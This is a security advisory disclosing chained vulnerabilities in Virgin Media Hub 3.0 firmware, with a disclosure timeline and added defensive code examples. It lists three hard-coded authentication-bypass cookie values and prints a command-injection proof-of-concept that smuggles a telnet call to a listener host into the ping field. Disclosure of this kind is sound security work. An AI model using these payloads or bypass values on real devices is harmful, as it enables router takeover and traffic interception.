Vendor: Virgin Media
Vendor URL: https://www.virginmedia.com/
Versions affected: products before Aug 2018 rollout / 9.1.116V and 9.1.885J
Systems Affected: Hub 3.0
Author: Balazs Bucsay (@xoreipeip)
Advisory URL / CVE Identifier: None
Risk: Critical
Summary
Multiple security vulnerabilities were found in the device’s firmware which, chained together, allowed unauthenticated remote command execution.
Location
Multiple parts of the firmware including different services and additional web-related files.
Impact
It was possible to take full control of the device, execute code on multiple operating systems, and sniff or spoof traffic on the internal network as well as the inbound and outbound Internet communications.
Details
DNS Rebinding
The web server did not validate the user-supplied Host header of HTTP requests, which made a DNS rebinding attack against the internal web-based management service possible.
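The usual mitigation for this class of issue is to compare the Host header against the names and addresses the management interface is legitimately reachable under, and refuse anything else before a request reaches a handler. The following is an added example (not Hub 3.0 firmware code, and not from NCC Group); the allowed hosts, the Express-style middleware shape and the 421 status are assumptions made for the illustration.

```javascript
// Added example: allowlist check on the HTTP Host header as a defence
// against DNS rebinding. A rebinding request carries the attacker's domain
// in Host, so it fails this check even though it reaches the LAN address.
// The entries below are constructed for the example.
const ALLOWED_HOSTS = new Set(['192.168.0.1', 'router.local']);

// Normalise a raw Host header: lower-case it and drop an optional :port
// suffix. Returns null when the header is missing or malformed, so that
// "missing" and "unknown" are both treated as rejections.
function normaliseHost(rawHost) {
  if (typeof rawHost !== 'string' || rawHost.length === 0) return null;
  const host = rawHost.trim().toLowerCase();
  // Bracketed IPv6 literal, e.g. "[fe80::1]:8080"
  const v6 = host.match(/^\[([0-9a-f:.]+)\](?::\d{1,5})?$/);
  if (v6) return v6[1];
  // Hostname or IPv4 literal, optionally followed by :port
  const m = host.match(/^([a-z0-9.-]+)(?::\d{1,5})?$/);
  return m ? m[1] : null;
}

// True only when the normalised Host is on the allowlist.
function hostHeaderAllowed(rawHost, allowed = ALLOWED_HOSTS) {
  const host = normaliseHost(rawHost);
  return host !== null && allowed.has(host);
}

// Express-style middleware (an assumed framework shape, not the device's
// own server): reject unknown hosts before any management handler runs.
function requireKnownHost(req, res, next) {
  if (!hostHeaderAllowed(req.headers.host)) {
    res.statusCode = 421; // Misdirected Request
    res.end('Unknown Host header');
    return;
  }
  next();
}
```

The check is deliberately strict about syntax: a header that cannot be parsed as a host is rejected rather than matched loosely, since the allowlist comparison is the only thing standing between a rebinding page and the management API.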
Authentication Bypass Cookies
Three static cookie values were hard-coded in the firmware’s web service binary; presenting any of them bypassed the authentication and authorisation procedures and gave access to all functionality of the device with administrator privileges.
Figure 1 – Backdoor cookies
The bypass cookie values were the following:
• XML_CONFIGURE
• HNAP_CONFIGURE
• TACACS_CONFIGURE
Authenticated DOM-Based XSS
One of the JavaScript files loaded by the management web page after authentication was vulnerable to DOM-based XSS: the page name taken from the URL was used unchecked to build script paths, so a remote JavaScript file could be included from an external source and executed in the victim’s browser.
Vulnerable code snippet:
base = getURLArgs() || getDefaultPage();
…
var modbase = base;
…
$.cachedScript(modbase + "_data.js?ver=9.1.116V", function success() {
    $.cachedScript(modbase + ".js?ver=9.1.116V", function success() {
        try {
            …
        } catch (e) {
            handleError(e); // XXXXX MOD. PROD00198245
        }
    });
});
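The root cause is that `modbase` flows from the URL straight into the script path. The hardened form below is an added example written for this advisory, not the firmware’s own code: the page names in the allowlist are assumptions, the version string is the one from the snippet above, and `$.cachedScript` is assumed to be the same jQuery helper the original uses. The value from the URL is only accepted if it is a plain identifier that names a known page; anything else falls back to the default page, so a crafted argument can never point the loader at another host or directory.

```javascript
// Added example: allowlisted page selection for the script loader.
// KNOWN_PAGES and DEFAULT_PAGE are constructed for the example.
const KNOWN_PAGES = new Set(['home', 'status', 'wireless', 'diagnostics']);
const DEFAULT_PAGE = 'home';
const SCRIPT_VERSION = '9.1.116V'; // version string from the vulnerable snippet

// Return the requested page only if it is a short identifier on the
// allowlist. '..', '/', '//host/x', 'http:' and query fragments all fail
// the character class, so they cannot reach the path concatenation.
function selectPage(urlArg) {
  if (typeof urlArg === 'string'
      && /^[a-z0-9_]{1,32}$/.test(urlArg)
      && KNOWN_PAGES.has(urlArg)) {
    return urlArg;
  }
  return DEFAULT_PAGE;
}

// Build the two relative script paths for a page. encodeURIComponent is
// a second layer; selectPage has already constrained the value.
function scriptPathsFor(urlArg) {
  const page = encodeURIComponent(selectPage(urlArg));
  const ver = encodeURIComponent(SCRIPT_VERSION);
  return [`${page}_data.js?ver=${ver}`, `${page}.js?ver=${ver}`];
}

// Browser-side loader mirroring the structure of the original snippet, but
// only ever loading paths produced by scriptPathsFor. $.cachedScript and
// handleError are assumed to exist on the page, as in the original.
function loadPageScripts(urlArg) {
  const [dataScript, pageScript] = scriptPathsFor(urlArg);
  $.cachedScript(dataScript, function success() {
    $.cachedScript(pageScript, function success() {
      try {
        // page initialisation goes here
      } catch (e) {
        handleError(e);
      }
    });
  });
}
```

An allowlist is preferable to trying to strip dangerous characters from the URL argument: the set of page scripts on the device is small and fixed, so the loader can simply refuse to load anything it does not already know about.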
Backdoor User
The root user of the operating system was enabled, and the same vendor-specific password, the name of the manufacturer, was set on both architectures.
Remote Command Execution
The ping and traceroute functionality in the management website was vulnerable to command injection. It was possible to execute arbitrary commands on the system as root.
Remote Command Execution on Second Architecture
The secondary architecture ran a service on TCP port 5150, one function of which allowed shell commands to be executed on the operating system. This made it possible to take control of the operating system running on the second, Intel x86 core.
A proof of concept value for the vulnerable functionality:
www.google.com$(telnet${IFS}192.168.0.2${IFS}4444/dev/null);4;
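The injection works because the diagnostic handler hands the user-supplied host straight to a shell. A hardened handler needs two independent layers: accept only syntactically valid hostnames or IPv4 addresses, and never pass the value through a shell at all, so that even a value that slips past validation is a single argv entry with no special meaning. The following is an added example, not the firmware’s code; the `ping -c 4` invocation and the injectable-handler shape are assumptions about the target system.

```javascript
// Added example: input validation plus argv execution for a ping handler.
// A DNS label: alphanumerics and hyphens, no leading/trailing hyphen, <= 63 chars.
const LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

function isValidIPv4(s) {
  const parts = s.split('.');
  return parts.length === 4
    && parts.every(p => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

function isValidHostname(s) {
  if (s.length === 0 || s.length > 253) return false;
  const labels = s.split('.');
  // An all-numeric last label is not a valid hostname TLD; this also keeps
  // malformed dotted quads such as 256.1.1.1 from being accepted as names.
  if (/^\d+$/.test(labels[labels.length - 1])) return false;
  return labels.every(l => LABEL.test(l));
}

// Returns the validated target, or null for anything else. Shell
// metacharacters ($, (, ), {, }, ;, whitespace) never match either grammar,
// so the proof-of-concept value above is rejected at this step.
function validatePingTarget(input) {
  if (typeof input !== 'string') return null;
  const value = input.trim();
  if (isValidIPv4(value) || isValidHostname(value)) return value;
  return null;
}

// Run ping without a shell. spawnFn is injectable so the logic can be
// exercised without actually sending packets; by default it is Node's
// child_process.spawn.
function runPing(input, spawnFn) {
  const target = validatePingTarget(input);
  if (target === null) {
    return { ok: false, error: 'invalid target' };
  }
  const spawn = spawnFn || require('child_process').spawn;
  // argv form: the target is one argument, never re-parsed by a shell.
  // A leading '-' cannot occur because the label grammar forbids it.
  const child = spawn('ping', ['-c', '4', target], { shell: false });
  return { ok: true, child };
}
```

Rejected values are worth logging at the handler, since an attempted injection against a diagnostic page is a strong signal that the device is being probed.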
Recommendation
Upgrade to the latest firmware – this is done automatically by Virgin Media where the modem is connected to the Internet.
Vendor Communication
17.01.2017 Dedicated NCC Group vulnerability research time spent on the target of assessment
22.03.2017 Contacted the vendor for the first time
24.03.2017 Details of the vulnerabilities shared with the vendor
08-09.2017 The first roll-out deadline – late August, early September
20.04.2018 Vendor contact, still not fixed or rolled out
31.07.2018 Release rolled-out, most issues fixed
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.